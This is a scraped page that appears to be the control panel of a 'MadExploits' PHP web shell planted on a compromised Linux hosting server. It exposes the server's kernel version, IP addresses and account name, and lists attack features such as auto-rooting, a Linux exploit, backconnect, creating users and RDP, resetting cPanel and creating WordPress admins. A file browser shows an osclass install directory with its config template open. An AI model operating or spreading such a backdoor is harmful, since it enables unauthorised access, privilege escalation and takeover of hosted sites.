Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.133.124.80
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
osclass /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
Bcrypt.php
2.82
KB
-rw-r--r--
changelog.txt
8.03
KB
-rw-r--r--
clone.php
6.67
KB
-rw-r--r--
config.php
1.28
KB
-rw-r--r--
edit.php
5.54
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
11.87
KB
-rw-r--r--
fileindex.php
135
B
-rw-r--r--
import.php
3.75
KB
-rw-r--r--
info.xml
2.41
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
6.52
KB
-rw-r--r--
install.xml
922
B
-rw-r--r--
md5
2.33
KB
-rw-r--r--
notes.txt
276
B
-rw-r--r--
update_pass.php
598
B
-rw-r--r--
upgrade.php
2.96
KB
-rw-r--r--
upgrade.xml
328
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php // Multi-site setup define('MULTISITE', 0); // MySql database host define('DB_HOST', '[[softdbhost]]'); // MySql database username define('DB_USER', '[[softdbuser]]'); // MySql database password define('DB_PASSWORD', '[[softdbpass]]'); // MySql database name define('DB_NAME', '[[softdb]]'); // MySql database table prefix define('DB_TABLE_PREFIX', '[[dbprefix]]'); // Relative web url define('REL_WEB_URL', '[[relativeurl]]/'); // Web address - modify here for SSL version of site define('WEB_PATH', '[[softurl]]/'); // *************************************** // // ** OPTIONAL CONFIGURATION PARAMETERS ** // // *************************************** // // Enable debugging // define('OSC_DEBUG', true); // define('OSC_DEBUG_DB', true); // define('OSC_DEBUG_LOG', true); // Demo mode //define('DEMO', true); //define('DEMO_THEMES', true); //define('DEMO_PLUGINS', true); // PHP memory limit (ideally should be more than 128MB) // define('OSC_MEMORY_LIMIT', 64); // MemCache caching option (database queries cache) // define('OSC_CACHE', 'memcache'); // $_cache_config[] = array('default_host' => 'localhost', 'default_port' => 11211, 'default_weight' => 1); // Increase default login time for user // session_set_cookie_params(2592000); // ini_set('session.gc_maxlifetime', 2592000); ?>
Close